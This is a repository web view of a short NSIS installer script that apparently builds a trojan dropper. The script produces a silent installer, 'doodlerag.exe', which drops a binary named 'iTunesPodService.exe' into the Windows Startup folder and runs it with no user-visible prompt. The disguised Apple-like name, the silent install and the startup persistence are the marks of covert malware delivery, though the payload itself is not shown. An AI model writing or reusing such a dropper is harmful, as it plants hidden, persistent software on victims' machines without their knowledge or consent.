summaryrefslogtreecommitdiffstats
path: root/installer.nsi
blob: 3fb75715e73ff1c303535c60c49b2b73257033a8 (plain) (blame)
1
2
3
4
5
6
7
8
9
OutFile "doodlerag.exe"
SilentInstall silent

Section
  SetSilent silent
  SetOutPath "$SMSTARTUP"
  File "bin\Release\iTunesPodService.exe"
  Exec "$SMSTARTUP/iTunesPodService.exe"
SectionEnd